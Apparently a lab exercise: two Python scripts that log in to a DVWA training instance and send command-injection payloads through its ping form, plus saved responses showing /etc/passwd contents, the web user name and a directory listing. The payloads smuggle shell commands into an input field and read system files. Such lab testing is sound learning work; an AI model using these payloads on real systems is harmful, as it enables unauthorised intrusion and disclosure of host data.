command_injection_scanner.py
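# Single-input check of the DVWA "Command Execution" form.
#
# The script logs in to a lab DVWA instance, posts one fixed value to the
# "ip" field and saves the reply so it can be read by hand. If the reply
# contains the output of the command placed after the pipe, the application
# is handing the field to a shell without validating it; the server-side fix
# is to accept only a well-formed IP address and to run ping without a shell.

# Import the necessary libraries.
from urllib.parse import urljoin

import requests

# Define the target URL and login credentials.
target_url = "http://192.168.134.129/dvwa/"
login_url = urljoin(target_url, "login.php")
login_data = {
    "username": "admin",
    "password": "password",
    "Login": "Login",
}

# Define the vulnerable page URL.
vuln_page_url = urljoin(target_url, "vulnerabilities/exec/")

# Define the test payload.
payload = "127.0.0.1 | cat /etc/passwd"

# requests has no default timeout, so an unreachable host would otherwise
# block the script forever.
REQUEST_TIMEOUT = 10

# File the raw response body is saved to.
OUTPUT_FILE = "response.txt"


def check_command_injection(base_url, login_url, login_data, vuln_page_url):
    """Log in, submit the module-level ``payload`` and save the response.

    Args:
        base_url: Root URL of the application. Not used by this function;
            kept so existing callers keep working.
        login_url: URL the login form is posted to.
        login_data: Form fields sent with the login request.
        vuln_page_url: URL of the form under test.

    Returns:
        None. Progress and the response body are printed, and the body is
        written to ``response.txt``. Network and file errors are reported on
        stdout instead of being raised.
    """
    print(f"[!] Checking for command injection vulnerabilities at {vuln_page_url}")

    # The session is closed on exit so the connection pool is released.
    with requests.Session() as session:
        # Authenticate with the application (DVWA).
        try:
            response = session.post(
                login_url, data=login_data, timeout=REQUEST_TIMEOUT
            )
        except requests.RequestException as e:
            print(f"[-] Error occurred while logging in: {e}")
            return

        if "Login failed" in response.text:
            print("[-] Authentication failed. Please check the credentials.")
            return

        # Send the payload through the form.
        form_data = {
            "ip": payload,
            "submit": "Submit",
        }
        try:
            response = session.post(
                vuln_page_url, data=form_data, timeout=REQUEST_TIMEOUT
            )
        except requests.RequestException as e:
            print(f"[-] Error occurred while testing payload '{payload}': {e}")
        else:
            print(f"[!] Payload used: {payload}")
            print("[+] Response after command injection:\n")
            print("=" * 80)
            print(response.text)
            print("=" * 80)
            print("\n[!] Please inspect the response to determine if the parameter is vulnerable to command injection.\n")

            # Write the response to a text file. The body can contain data
            # read from the target host, so the file should be handled like
            # any other assessment evidence.
            try:
                with open(OUTPUT_FILE, "w", encoding="utf-8") as f:
                    f.write(response.text)
            except OSError as e:
                # Reported separately so a disk problem is not mistaken for
                # a failed request.
                print(f"[-] Could not write {OUTPUT_FILE}: {e}")
            else:
                print(f"[+] Response written to {OUTPUT_FILE}")

    print("[+] Command injection testing completed.\n")


# Call the function with the required parameters. The guard keeps an import
# of this module from sending requests.
if __name__ == "__main__":
    check_command_injection(target_url, login_url, login_data, vuln_page_url)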
command_injection_scanner_auto.py
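# Multi-input check of the DVWA "Command Execution" form.
#
# The script logs in to a lab DVWA instance, posts each entry of ``payloads``
# to the "ip" field in turn and saves every reply for manual review. A reply
# that contains the output of the command placed after the pipe means the
# application is handing the field to a shell without validating it; the
# server-side fix is to accept only a well-formed IP address and to run ping
# without a shell.

# Import the necessary libraries.
from urllib.parse import urljoin

import requests
from colorama import Fore, Style, init

# Initialise colorama.
init()

# Define the target URL and login credentials.
target_url = "http://192.168.134.129/dvwa/"
login_url = urljoin(target_url, "login.php")
login_data = {
    "username": "admin",
    "password": "password",
    "Login": "Login",
}

# Define the vulnerable page URL.
vuln_page_url = urljoin(target_url, "vulnerabilities/exec/")

# Define the test payloads.
payloads = [
    "ls | whoami",
    "127.0.0.1 | cat /etc/passwd",
    "127.0.0.1 | ls -la",
]

# requests has no default timeout, so an unreachable host would otherwise
# block the script forever.
REQUEST_TIMEOUT = 10

# File the collected responses are saved to.
OUTPUT_FILE = "multiple_payload_response.txt"


def check_command_injection(base_url, login_url, login_data, vuln_page_url, payloads):
    """Log in, submit each payload to the form and save all responses.

    Args:
        base_url: Root URL of the application. Not used by this function;
            kept so existing callers keep working.
        login_url: URL the login form is posted to.
        login_data: Form fields sent with the login request.
        vuln_page_url: URL of the form under test.
        payloads: Iterable of strings, each sent as the "ip" field.

    Returns:
        None. Progress and response bodies are printed, and one combined
        report is written to ``multiple_payload_response.txt``. Network and
        file errors are reported on stdout instead of being raised.
    """
    print(f"[!] Checking for command injection vulnerabilities at {vuln_page_url}")

    # Report fragments are collected in a list and joined once at the end,
    # which avoids rebuilding a large string on every iteration.
    report = []
    separator = "=" * 80

    # The session is closed on exit so the connection pool is released.
    with requests.Session() as session:
        # Authenticate with the application.
        try:
            response = session.post(
                login_url, data=login_data, timeout=REQUEST_TIMEOUT
            )
        except requests.RequestException as e:
            print(f"{Fore.RED}[-] Error occurred while logging in: {e}{Style.RESET_ALL}")
            return

        if "Login failed" in response.text:
            print("[-] Authentication failed. Please check the credentials.")
            return

        for payload in payloads:
            # Send the payload through the form.
            form_data = {
                "ip": payload,
                "submit": "Submit",
            }
            try:
                response = session.post(
                    vuln_page_url, data=form_data, timeout=REQUEST_TIMEOUT
                )
            except requests.RequestException as e:
                # One failed request must not stop the remaining payloads.
                print(f"{Fore.RED}[-] Error occurred while testing payload '{payload}': {e}{Style.RESET_ALL}")
                report.append(f"[-] Error occurred while testing payload '{payload}': {e}\n")
                continue

            print(f"{Fore.GREEN}[!] Payload used: {payload}{Style.RESET_ALL}")
            print("[+] Response after command injection:\n")
            print(separator)
            print(response.text)
            print(separator)
            print(f"\n{Fore.YELLOW}[!] Please manually inspect the response to determine if the parameter is vulnerable to command injection.{Style.RESET_ALL}\n")

            report.append(f"[!] Payload used: {payload}\n")
            report.append("[+] Response after command injection:\n")
            report.append(separator + "\n")
            report.append(response.text)
            report.append(separator + "\n\n")

    # Write the responses to a text file. The bodies can contain data read
    # from the target host, so the file should be handled like any other
    # assessment evidence.
    try:
        with open(OUTPUT_FILE, "w", encoding="utf-8") as f:
            f.write("".join(report))
    except OSError as e:
        print(f"{Fore.RED}[-] Could not write {OUTPUT_FILE}: {e}{Style.RESET_ALL}")
    else:
        # The original message named response.txt, which is not the file
        # this script writes.
        print(f"[+] Responses written to {OUTPUT_FILE}")

    print("[+] Command injection testing completed.\n")


# Call the function with the required parameters. The guard keeps an import
# of this module from sending requests.
if __name__ == "__main__":
    check_command_injection(target_url, login_url, login_data, vuln_page_url, payloads)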
response.txt
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" 
name="submit"></form><pre>root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shdhcp:x:101:102::/nonexistent:/bin/falsesyslog:x:102:103::/home/syslog:/bin/falseklog:x:103:104::/home/klog:/bin/falsesshd:x:104:65534::/var/run/sshd:/usr/sbin/nologinmsfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bashbind:x:105:113::/var/cache/bind:/bin/falsepostfix:x:106:115::/var/spool/postfix:/bin/falseftp:x:107:65534::/home/ftp:/bin/falsepostgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashmysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/falsetomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/falsedistccd:x:111:65534::/:/bin/falseuser:x:1001:1001:just a user,111,,:/home/user:/bin/bashservice:x:1002:1002:,,,:/home/service:/bin/bashtelnetd:x:112:120::/nonexistent:/bin/falseproftpd:x:113:65534::/var/run/proftpd:/bin/falsestatd:x:114:65534::/var/lib/nfs:/bin/false</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br 
/></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>
multiple_payload_response.txt
[!] Payload used: ls | whoami[+] Response after command injection:================================================================================<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" 
name="submit"></form><pre>www-data</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br /></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>================================================================================[!] Payload used: 127.0.0.1 | cat /etc/passwd[+] Response after command injection:================================================================================<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a 
href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" name="submit"></form><pre>root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System 
(admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shdhcp:x:101:102::/nonexistent:/bin/falsesyslog:x:102:103::/home/syslog:/bin/falseklog:x:103:104::/home/klog:/bin/falsesshd:x:104:65534::/var/run/sshd:/usr/sbin/nologinmsfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bashbind:x:105:113::/var/cache/bind:/bin/falsepostfix:x:106:115::/var/spool/postfix:/bin/falseftp:x:107:65534::/home/ftp:/bin/falsepostgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bashmysql:x:109:118:MySQL Server,,,:/var/lib/mysql:/bin/falsetomcat55:x:110:65534::/usr/share/tomcat5.5:/bin/falsedistccd:x:111:65534::/:/bin/falseuser:x:1001:1001:just a user,111,,:/home/user:/bin/bashservice:x:1002:1002:,,,:/home/service:/bin/bashtelnetd:x:112:120::/nonexistent:/bin/falseproftpd:x:113:65534::/var/run/proftpd:/bin/falsestatd:x:114:65534::/var/lib/nfs:/bin/false</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br /></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>================================================================================[!] 
Payload used: 127.0.0.1 | ls -la[+] Response after command injection:================================================================================<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Damn Vulnerable Web App (DVWA) v1.0.7 :: Vulnerability: Brute Force</title><link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" /><link rel="icon" type="\image/ico" href="../../favicon.ico" /><script type="text/javascript" src="../../dvwa/js/dvwaPage.js"></script></head><body><div><div><img src="../../dvwa/images/logo.png" alt="Damn Vulnerable Web App" /></div><div><div><ul><li><a href="../../.">Home</a></li><li><a href="../../instructions.php">Instructions</a></li><li><a href="../../setup.php">Setup</a></li></ul><ul><li><a href="../../vulnerabilities/brute/.">Brute Force</a></li><li><a href="../../vulnerabilities/exec/.">Command Execution</a></li><li><a href="../../vulnerabilities/csrf/.">CSRF</a></li><li><a href="../../vulnerabilities/fi/.?page=include.php">File Inclusion</a></li><li><a href="../../vulnerabilities/sqli/.">SQL Injection</a></li><li><a href="../../vulnerabilities/sqli_blind/.">SQL Injection (Blind)</a></li><li><a href="../../vulnerabilities/upload/.">Upload</a></li><li><a href="../../vulnerabilities/xss_r/.">XSS reflected</a></li><li><a href="../../vulnerabilities/xss_s/.">XSS stored</a></li></ul><ul><li><a href="../../security.php">DVWA Security</a></li><li><a href="../../phpinfo.php">PHP Info</a></li><li><a href="../../about.php">About</a></li></ul><ul><li><a href="../../logout.php">Logout</a></li></ul></div></div><div><div><h1>Vulnerability: Command Execution</h1><div><h2>Ping for FREE</h2><p>Enter an IP address below:</p><form name="ping" action="#" method="post"><input type="text" name="ip" size="30"><input type="submit" value="submit" 
name="submit"></form><pre>total 20drwxr-xr-x 4 www-data www-data 4096 May 20 2012 .drwxr-xr-x 11 www-data www-data 4096 May 20 2012 ..drwxr-xr-x 2 www-data www-data 4096 May 20 2012 help-rw-r--r-- 1 www-data www-data 1509 Mar 16 2010 index.phpdrwxr-xr-x 2 www-data www-data 4096 May 20 2012 source</pre></div><h2>More info</h2><ul><li><a href="http://hiderefer.com/?http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution">http://www.scribd.com/doc/2530476/Php-Endangers-Remote-Code-Execution</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/bash/">http://www.ss64.com/bash/</a></li><li><a href="http://hiderefer.com/?http://www.ss64.com/nt/">http://www.ss64.com/nt/</a></li></ul></div><br /><br /></div><div></div><div><input type="button" value="View Help"> <input type="button" value="View Source"> <div align="left"><b>Username:</b> admin<br /><b>Security Level:</b> medium<br /><b>PHPIDS:</b> disabled</div></div><div><p>Damn Vulnerable Web Application (DVWA) v1.0.7</p></div></div></body></html>================================================================================